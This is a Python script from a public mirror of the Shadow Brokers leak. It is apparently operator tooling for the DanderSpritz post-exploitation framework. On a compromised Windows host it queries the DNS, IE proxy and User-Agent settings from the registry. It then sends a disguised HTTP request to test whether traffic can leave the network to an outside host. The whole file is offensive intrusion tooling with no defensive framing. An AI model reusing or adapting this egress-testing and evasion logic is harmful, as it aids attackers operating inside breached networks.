sneedmca/shadowbrokers-exploits
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
shadowbrokers-exploits/windows/Resources/Ops/PyScripts/cangetout.py

156 lines
6.6 KiB
Python
Raw Normal View History

Inital commit of Shadowbrokers 'Lost in Translation' release
2017-04-14 09:45:07 +00:00
import dsz
import dsz.lp
import dsz.file
import os, sys, re
import base64, traceback
from optparse import OptionParser
import ops, ops.cmd, util.ip
class canGetOut:
def __init__(self, options):
self.ip = options.ipdst
self.port = options.port
self.domain = None
self.userAgent = 'User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'
self.proxy_ip = None
self.proxy_port = None
self.dns = []
def main(self):
self.getDNS()
if self.ip:
if (not re.match('(\\d{1,3}\\.){3}\\d{1,3}', self.ip)):
dsz.ui.Echo('Resolving IP address...')
self.domain = self.ip
self.ip = self.nslookup(self.ip)
else:
self.domain = self.ip
else:
self.menu()
if (self.ip and self.port):
dsz.ui.Echo('Looking for IE Proxy Settings in the Registry...')
self.proxy()
dsz.ui.Echo('Getting User-Agent string from the registry...')
self.getUserAgent()
dsz.ui.Echo('Attempting to get out...')
self.getOut()
def menu(self):
addrlist = ['www.microsoft.com', 'www.google.com', 'www.yahoo.com']
dsz.ui.Echo('Choose an address...')
for index in range(len(addrlist)):
dsz.ui.Echo(('%d) %s' % ((index + 1), addrlist[index])))
choice = dsz.ui.GetInt('Enter number:', '1')
if ((choice <= 0) or (choice > len(addrlist))):
dsz.ui.Echo('Invalid choice', dsz.ERROR)
else:
dsz.ui.Echo(('You chose: %s' % addrlist[(choice - 1)]))
self.domain = addrlist[(choice - 1)]
self.ip = self.nslookup(addrlist[(choice - 1)])
def getDNS(self):
cmd = ops.cmd.getDszCommand('ipconfig', dszquiet=True)
obj = cmd.execute()
try:
for dnsserver in obj.fixeddataitem.dnsservers.dnsserver:
self.dns.append(dnsserver.ip)
except:
dsz.ui.Echo('\tError getting dns servers', dsz.ERROR)
def nslookup(self, name):
cmd = ops.cmd.getDszCommand(('nameserverlookup %s' % name), dszquiet=True)
obj = cmd.execute()
if (not cmd.success):
dsz.ui.Echo('\tError: Unable to complete remote nslookup', dsz.ERROR)
return None
for hostinfo in obj.hostinfo:
if util.ip.validate_ipv4(hostinfo.info):
dsz.ui.Echo(('\t%s' % hostinfo.info.strip()))
return hostinfo.info.strip()
return None
def getUserAgent(self):
cmd = ops.cmd.getDszCommand('registryquery -hive C', dszquiet=True)
cmd.value = u'"User Agent"'
cmd.key = u'"Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings"'
obj = cmd.execute()
if (not cmd.success):
dsz.ui.Echo('\tUser Agent regquery failed', dsz.ERROR)
self.userAgent = obj.key[0].value[0].value.strip()
dsz.ui.Echo(('\tUser agent set to: %s' % self.userAgent))
def proxy(self):
cmd = ops.cmd.getDszCommand('registryquery -hive C', dszquiet=True)
cmd.value = u'"ProxyEnable"'
cmd.key = u'"Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings"'
obj = cmd.execute()
if (not cmd.success):
dsz.ui.Echo('\tProxy registryquery failed', dsz.ERROR)
return
enabled = obj.key[0].value[0].value.strip()
if (enabled == '1'):
dsz.ui.Echo('\tProxy is currently ENABLED. Querying registry for server')
cmd.value = u'"ProxyServer"'
obj = cmd.execute()
if (not cmd.success):
dsz.ui.Echo('\tFailed to get ProxyServer', dsz.ERROR)
return
server = obj.key[0].value[0].value.strip()
dsz.ui.Echo(('\tProxy server is: %s' % str(server)))
(self.proxy_ip, self.proxy_port) = server.strip().split(':')
else:
dsz.ui.Echo('\tIE Proxy currently DISABLED')
def getOut(self):
cmd = ops.cmd.getDszCommand('banner')
if (self.proxy_ip and self.proxy_port):
dsz.ui.Echo(('Proxy: %s:%s' % (self.proxy_ip, self.proxy_port)))
choice = dsz.ui.Prompt('It appears a proxy is set. Banner with proxy settings?')
if (choice == 1):
cmd = ops.cmd.getDszCommand('banner')
cmd.optdict['ip'] = self.proxy_ip
cmd.optdict['port'] = self.proxy_port
cmd.optdict['wait'] = '5'
cmd.optdict['send'] = ('"GET http://%s/ HTTP/1.0\\r\\nHost: %s\\r\\nUser-Agent: %s\\r\\nProxy-Connection: Keep-Alive\\r\\n\\r\\n"' % (self.domain, self.domain, self.userAgent))
else:
cmd = ops.cmd.getDszCommand('banner')
cmd.optdict['ip'] = self.ip
cmd.optdict['port'] = self.port
cmd.optdict['wait'] = '5'
cmd.optdict['send'] = '"GET / HTTP/1.0\\r\\n\\r\\n"'
else:
cmd = ops.cmd.getDszCommand('banner')
cmd.optdict['ip'] = self.ip
cmd.optdict['port'] = self.port
cmd.optdict['wait'] = '5'
cmd.optdict['send'] = ('"GET / HTTP/1.0\\r\\nHost: %s\\r\\nUser-Agent: %s\\r\\n\\r\\n"' % (self.domain, self.userAgent))
obj = cmd.execute()
if (not cmd.success):
dsz.ui.Echo(('\tCan not get out to %s:%s' % (self.ip, self.port)), dsz.ERROR)
return
if (len(obj.transfer) == 0):
dsz.ui.Echo(("\tWe seem to have gotten a 'Timeout waiting for data', check CMDID %s" % obj.cmdid), dsz.WARNING)
return
response = obj.transfer[0].text.splitlines()[0]
dsz.ui.Echo(('\t%s' % response))
if (response.find('200 OK') != (-1)):
dsz.ui.Echo('We can get out successfully!', dsz.GOOD)
else:
dsz.ui.Echo('Non 200 OK Response Received', dsz.WARNING)
def parseArgs():
usage = 'cangetout -d <IP ADDRESS|FQDN> -p <PORT>'
parser = OptionParser(usage=usage)
parser.add_option('-d', dest='ipdst', type='string', action='store', default=None)
parser.add_option('-p', dest='port', type='string', action='store', default='80')
(options, args) = parser.parse_args(sys.argv)
print usage
if ((len(sys.argv) == 1) or ((options.ipdst or options.port) and (len(args) > 0))):
canGetOut(options).main()
else:
dsz.ui.Echo('Exiting...')
return
if (__name__ == '__main__'):
parseArgs()
Reference in a new issue Copy permalink